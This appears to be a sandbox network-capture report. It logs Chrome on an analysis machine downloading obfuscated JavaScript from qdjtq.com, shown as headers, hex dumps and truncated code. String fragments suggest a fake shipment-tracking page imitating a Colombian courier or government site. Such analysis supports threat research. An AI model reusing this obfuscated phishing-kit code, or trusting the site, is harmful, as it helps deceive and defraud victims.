            2024-09-27 00:29:37 UTC5636INData Raw: 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 65 bb 45 ff 92 cf 7c ff ff ff ff
            Data Ascii: kKkKkKkKkKkKkKkKkKkKkKkKlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlMlMlMlMlMlMlMlMlMlMlMlMeE|


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.649730129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC528OUTGET /modify/assets/09bf01f8ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 2091
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"82b-19024951b30"
            2024-09-27 00:29:37 UTC2091INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 61 37 34 37 62 2c 5f 30 78 34 38 39 32 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 39 31 61 3d 61 32 5f 30 78 35 35 61 39 2c 5f 30 78 32 63 31 39 66 34 3d 5f 30 78 34 61 37 34 37 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 63 66 34 35 38 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 63 34 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61 28 30 78 62 64 29 29 2f 30 78 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 39 31 61
            Data Ascii: (function(_0x4a747b,_0x4892c3){const _0x4ad91a=a2_0x55a9,_0x2c19f4=_0x4a747b();while(!![]){try{const _0x4cf458=-parseInt(_0x4ad91a(0xbb))/0x1*(parseInt(_0x4ad91a(0xb7))/0x2)+parseInt(_0x4ad91a(0xc4))/0x3*(parseInt(_0x4ad91a(0xbd))/0x4)+-parseInt(_0x4ad91a


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.649735129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC528OUTGET /modify/assets/00b63b5cajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 2600
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"a28-19024951b30"
            2024-09-27 00:29:37 UTC2600INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 38 37 65 63 62 33 2c 5f 30 78 32 39 35 62 32 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 30 32 65 62 3d 61 30 5f 30 78 31 66 36 37 2c 5f 30 78 63 65 66 35 33 61 3d 5f 30 78 38 37 65 63 62 33 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 30 35 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 61 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 39 36 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 66 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30 32 65 62 28 30 78 31 38 38 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 30
            Data Ascii: (function(_0x87ecb3,_0x295b21){const _0x5402eb=a0_0x1f67,_0xcef53a=_0x87ecb3();while(!![]){try{const _0x4ad053=parseInt(_0x5402eb(0x18a))/0x1*(-parseInt(_0x5402eb(0x196))/0x2)+-parseInt(_0x5402eb(0x18f))/0x3+parseInt(_0x5402eb(0x188))/0x4+-parseInt(_0x540


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            18192.168.2.649732129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC528OUTGET /modify/assets/522b5b49ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC363INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 87444
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"15594-19024951b30"
            2024-09-27 00:29:37 UTC16021INData Raw: 63 6f 6e 73 74 20 61 31 34 5f 30 78 33 62 65 62 34 32 3d 61 31 34 5f 30 78 31 39 34 30 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 35 62 34 65 38 2c 5f 30 78 62 65 34 65 61 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 38 32 31 64 33 3d 61 31 34 5f 30 78 31 39 34 30 2c 5f 30 78 66 37 62 35 31 65 3d 5f 30 78 33 35 62 34 65 38 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 62 35 36 31 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 31 39 36 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 32 37 64 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38 32 31 64 33 28 30 78 32 66 30 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 38
            Data Ascii: const a14_0x3beb42=a14_0x1940;(function(_0x35b4e8,_0xbe4ea8){const _0x3821d3=a14_0x1940,_0xf7b51e=_0x35b4e8();while(!![]){try{const _0x5b5613=-parseInt(_0x3821d3(0x196))/0x1*(-parseInt(_0x3821d3(0x27d))/0x2)+-parseInt(_0x3821d3(0x2f0))/0x3+-parseInt(_0x38
            2024-09-27 00:29:37 UTC16384INData Raw: 72 63 27 3a 5f 2c 27 77 69 64 74 68 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 33 39 29 2c 27 68 65 69 67 68 74 27 3a 27 32 37 27 2c 27 61 6c 74 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 32 63 29 2b 27 67 61 27 7d 29 5d 2c 2d 30 78 31 29 2c 5a 3d 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 75 6c 27 2c 7b 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 36 36 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 64 64 29 2b 27 5c 78 32 30 66 6c 65 78 2d 73 6d 2d 63 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 61 32 29 2b 27 2d 6d 64 2d 72 6f 77 5c 78 32 30 66 6c 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 66 37 29 7d 2c 5b 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 6c 69 27 2c 6e 75 6c 6c 2c 5b
            Data Ascii: rc':_,'width':a14_0x3beb42(0x439),'height':'27','alt':a14_0x3beb42(0x22c)+'ga'})],-0x1),Z=a14_0x495ddf('ul',{'class':a14_0x3beb42(0x366)+a14_0x3beb42(0x3dd)+'\x20flex-sm-c'+a14_0x3beb42(0x4a2)+'-md-row\x20fl'+a14_0x3beb42(0x4f7)},[a14_0x495ddf('li',null,[
            2024-09-27 00:29:37 UTC16384INData Raw: 28 27 61 27 2c 7b 27 68 72 65 66 27 3a 27 68 74 74 70 3a 2f 2f 77 77 77 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 35 66 29 2b 27 65 67 61 2e 63 6f 6d 2f 77 70 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 64 35 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 33 66 29 2b 27 64 69 67 69 74 61 6c 65 73 2f 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 30 32 29 2c 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 33 32 29 7d 2c 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 61 66 29 29 5d 29 5d 29 5d 29 5d 29 2c 61 31 34 5f 30 78 34 39 35 64 64 66 28 27 64 69 76 27 2c 7b 27 63 6c 61 73 73 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 30 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 63
            Data Ascii: ('a',{'href':'http://www'+a14_0x3beb42(0x25f)+'ega.com/wp'+a14_0x3beb42(0x2d5)+a14_0x3beb42(0x33f)+'digitales/'+a14_0x3beb42(0x402),'class':a14_0x3beb42(0x232)},a14_0x3beb42(0x3af))])])])]),a14_0x495ddf('div',{'class':a14_0x3beb42(0x500)+a14_0x3beb42(0x2c
            2024-09-27 00:29:37 UTC16384INData Raw: 30 78 34 30 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 33 65 29 2b 27 2d 30 2e 30 37 35 30 30 30 33 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 34 32 29 2b 27 30 30 31 5c 78 32 30 39 2e 33 4c 30 2e 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 39 33 29 2b 27 5a 27 2c 27 69 64 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 61 30 29 2c 27 66 69 6c 6c 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 64 65 29 2c 27 66 69 6c 6c 2d 72 75 6c 65 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 61 36 29 2c 27 73 74 72 6f 6b 65 27 3a 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 31 30 29 7d 29 5d 29 5d 29 2c 61 31 34 5f 30 78 34 39 35 64 64 66 28 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 38 35 29 2c 7b 27 63
            Data Ascii: 0x400)+a14_0x3beb42(0x23e)+'-0.0750003'+a14_0x3beb42(0x442)+'001\x209.3L0.'+a14_0x3beb42(0x293)+'Z','id':a14_0x3beb42(0x4a0),'fill':a14_0x3beb42(0x2de),'fill-rule':a14_0x3beb42(0x1a6),'stroke':a14_0x3beb42(0x410)})])]),a14_0x495ddf(a14_0x3beb42(0x385),{'c
            2024-09-27 00:29:37 UTC16384INData Raw: 28 30 78 34 33 64 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 35 36 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 61 65 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 34 39 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 32 66 38 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 37 30 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 64 66 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 31 61 39 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 35 35 38 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 37 64 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 34 39 65 29 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30 78 33 35 37 29 2b 27 77 77 2e 73 65 72 76 69 65 6e 27 2b 61 31 34 5f 30 78 33 62 65 62 34 32 28 30
            Data Ascii: (0x43d)+a14_0x3beb42(0x256)+a14_0x3beb42(0x3ae)+a14_0x3beb42(0x449)+a14_0x3beb42(0x2f8)+a14_0x3beb42(0x570)+a14_0x3beb42(0x1df)+a14_0x3beb42(0x1a9)+a14_0x3beb42(0x558)+a14_0x3beb42(0x47d)+a14_0x3beb42(0x49e)+a14_0x3beb42(0x357)+'ww.servien'+a14_0x3beb42(0
            2024-09-27 00:29:37 UTC5887INData Raw: 2d 74 6f 62 2d 62 61 72 5c 78 32 32 27 2c 27 4b 44 48 41 41 52 77 50 39 4b 27 2c 27 5c 78 32 30 74 69 74 6c 65 2d 74 6f 62 27 2c 27 61 6c 2f 72 61 73 74 72 65 6f 27 2c 27 2e 67 6f 76 2e 63 6f 2f 5c 78 32 32 5c 78 32 30 27 2c 27 31 38 32 36 39 34 30 38 32 5c 78 32 32 27 2c 27 65 2d 6f 70 65 6e 65 72 27 2c 27 62 2d 6d 65 6e 75 5c 78 32 32 3e 3c 6c 27 2c 27 5c 78 32 30 74 6f 62 2d 62 61 72 2d 73 27 2c 27 64 2d 66 6c 65 78 5c 78 32 30 74 65 78 27 2c 27 73 74 72 65 6f 2d 65 6e 76 69 27 2c 27 69 73 74 2d 75 6e 73 74 79 6c 27 2c 27 3e 3c 2f 64 69 76 3e 3c 64 69 27 2c 27 61 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 68 74 27 2c 27 61 76 2d 6c 69 6e 6b 5c 78 32 32 3e 4f 27 2c 27 78 2d 73 6d 2d 63 6f 6c 75 6d 27 2c 27 52 61 73 74 72 65 61 72 5c 78 32 30 70 27 2c 27 41
            Data Ascii: -tob-bar\x22','KDHAARwP9K','\x20title-tob','al/rastreo','.gov.co/\x22\x20','182694082\x22','e-opener','b-menu\x22><l','\x20tob-bar-s','d-flex\x20tex','streo-envi','ist-unstyl','></div><di','a\x20href=\x22ht','av-link\x22>O','x-sm-colum','Rastrear\x20p','A


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            19192.168.2.649736129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC363OUTGET /modify/assets/7ae8a4f5ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 53555
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"d133-19024951b30"
            2024-09-27 00:29:37 UTC16022INData Raw: 63 6f 6e 73 74 20 61 31 39 5f 30 78 35 62 37 34 35 34 3d 61 31 39 5f 30 78 34 66 61 30 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 64 66 65 37 2c 5f 30 78 35 32 65 66 66 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 35 66 66 34 37 3d 61 31 39 5f 30 78 34 66 61 30 2c 5f 30 78 35 35 63 30 66 34 3d 5f 30 78 32 33 64 66 65 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 36 39 62 39 63 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 33 62 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 34 65 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66 34 37 28 30 78 32 32 30 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 35 66 66
            Data Ascii: const a19_0x5b7454=a19_0x4fa0;(function(_0x23dfe7,_0x52eff6){const _0x15ff47=a19_0x4fa0,_0x55c0f4=_0x23dfe7();while(!![]){try{const _0x269b9c=-parseInt(_0x15ff47(0x23b))/0x1+parseInt(_0x15ff47(0x24e))/0x2*(parseInt(_0x15ff47(0x220))/0x3)+-parseInt(_0x15ff
            2024-09-27 00:29:37 UTC16384INData Raw: 5f 30 78 35 36 39 39 36 31 3b 5f 30 78 31 39 36 65 37 30 26 26 28 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 30 3f 5f 30 78 66 34 64 33 63 38 5b 5f 30 78 33 62 65 36 38 32 28 30 78 32 35 64 29 5d 28 7b 27 74 79 70 65 27 3a 30 78 30 2c 27 76 61 6c 75 65 27 3a 5f 30 78 31 39 36 65 37 30 7d 29 3a 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 31 7c 7c 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 32 7c 7c 5f 30 78 33 32 62 33 39 31 3d 3d 3d 30 78 33 3f 28 5f 30 78 66 34 64 33 63 38 5b 5f 30 78 33 62 65 36 38 32 28 30 78 32 35 61 29 5d 3e 30 78 31 26 26 28 5f 30 78 66 66 34 34 62 36 3d 3d 3d 27 2a 27 7c 7c 5f 30 78 66 66 34 34 62 36 3d 3d 3d 27 2b 27 29 26 26 5f 30 78 35 65 31 61 32 32 28 27 41 5c 78 32 30 72 65 70 65 61 74 61 62 27 2b 27 6c 65 5c 78 32 30 70 61 72 61
            Data Ascii: _0x569961;_0x196e70&&(_0x32b391===0x0?_0xf4d3c8[_0x3be682(0x25d)]({'type':0x0,'value':_0x196e70}):_0x32b391===0x1||_0x32b391===0x2||_0x32b391===0x3?(_0xf4d3c8[_0x3be682(0x25a)]>0x1&&(_0xff44b6==='*'||_0xff44b6==='+')&&_0x5e1a22('A\x20repeatab'+'le\x20para
            2024-09-27 00:29:37 UTC16384INData Raw: 78 31 36 37 31 33 31 5b 5f 30 78 33 36 32 62 64 37 28 30 78 31 63 65 29 5d 28 5f 30 78 34 37 66 33 39 30 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 62 65 38 66 31 30 3d 5f 30 78 33 36 32 62 64 37 3b 69 66 28 21 5f 30 78 34 37 66 33 39 30 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 5b 5f 30 78 62 65 38 66 31 30 28 30 78 32 30 33 29 5d 28 6e 65 77 20 45 72 72 6f 72 28 27 43 6f 75 6c 64 6e 5c 78 32 37 74 5c 78 32 30 72 27 2b 5f 30 78 62 65 38 66 31 30 28 30 78 31 66 36 29 2b 5f 30 78 62 65 38 66 31 30 28 30 78 32 39 33 29 2b 5f 30 78 33 66 36 30 65 64 2b 5f 30 78 62 65 38 66 31 30 28 30 78 32 36 64 29 2b 5f 30 78 63 37 34 31 34 61 5b 5f 30 78 62 65 38 66 31 30 28 30 78 31 66 39 29 5d 2b 27 5c 78 32 32 27 29 29 3b 63 6f 6e 73 74 20 5f 30 78 34 62 65 38 35 30 3d 6e
            Data Ascii: x167131[_0x362bd7(0x1ce)](_0x47f390=>{const _0xbe8f10=_0x362bd7;if(!_0x47f390)return Promise[_0xbe8f10(0x203)](new Error('Couldn\x27t\x20r'+_0xbe8f10(0x1f6)+_0xbe8f10(0x293)+_0x3f60ed+_0xbe8f10(0x26d)+_0xc7414a[_0xbe8f10(0x1f9)]+'\x22'));const _0x4be850=n
            2024-09-27 00:29:37 UTC4765INData Raw: 62 64 28 5f 30 78 37 33 39 65 63 35 5b 27 74 6f 27 5d 2c 5f 30 78 33 31 31 39 31 36 29 5b 5f 30 78 34 31 66 30 32 65 28 30 78 31 63 65 29 5d 28 5f 30 78 34 37 38 35 30 36 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 34 64 31 35 34 3d 5f 30 78 34 31 66 30 32 65 3b 49 28 5f 30 78 34 37 38 35 30 36 2c 30 78 31 34 29 26 26 21 5f 30 78 31 34 34 33 38 38 5b 5f 30 78 35 34 64 31 35 34 28 30 78 31 65 36 29 5d 26 26 5f 30 78 31 34 34 33 38 38 5b 5f 30 78 35 34 64 31 35 34 28 30 78 32 35 36 29 5d 3d 3d 3d 59 5b 27 70 6f 70 27 5d 26 26 5f 30 78 35 39 37 36 38 39 5b 27 67 6f 27 5d 28 2d 30 78 31 2c 21 30 78 31 29 3b 7d 29 5b 5f 30 78 34 31 66 30 32 65 28 30 78 31 65 37 29 5d 28 57 29 2c 50 72 6f 6d 69 73 65 5b 5f 30 78 34 31 66 30 32 65 28 30 78 32 30 33 29 5d 28 29 29 3a
            Data Ascii: bd(_0x739ec5['to'],_0x311916)[_0x41f02e(0x1ce)](_0x478506=>{const _0x54d154=_0x41f02e;I(_0x478506,0x14)&&!_0x144388[_0x54d154(0x1e6)]&&_0x144388[_0x54d154(0x256)]===Y['pop']&&_0x597689['go'](-0x1,!0x1);})[_0x41f02e(0x1e7)](W),Promise[_0x41f02e(0x203)]()):


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            20192.168.2.649738129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC528OUTGET /modify/assets/230e1227ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:38 UTC361INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 6439
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1927-19024951b30"
            2024-09-27 00:29:38 UTC6439INData Raw: 63 6f 6e 73 74 20 61 37 5f 30 78 32 35 65 35 33 38 3d 61 37 5f 30 78 38 32 35 31 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 66 39 63 64 2c 5f 30 78 35 37 30 62 64 37 29 7b 63 6f 6e 73 74 20 5f 30 78 34 34 39 35 30 39 3d 61 37 5f 30 78 38 32 35 31 2c 5f 30 78 31 64 64 37 65 65 3d 5f 30 78 32 30 66 39 63 64 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 39 63 66 65 62 34 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 62 61 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 39 63 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 63 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 34 39 35 30 39 28 30 78 62
            Data Ascii: const a7_0x25e538=a7_0x8251;(function(_0x20f9cd,_0x570bd7){const _0x449509=a7_0x8251,_0x1dd7ee=_0x20f9cd();while(!![]){try{const _0x9cfeb4=parseInt(_0x449509(0xba))/0x1*(parseInt(_0x449509(0x9c))/0x2)+-parseInt(_0x449509(0xcd))/0x3+-parseInt(_0x449509(0xb


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            21192.168.2.649739129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:38 UTC528OUTGET /modify/assets/c27b6911ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:38 UTC360INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:38 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 1917
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"77d-190249532a0"
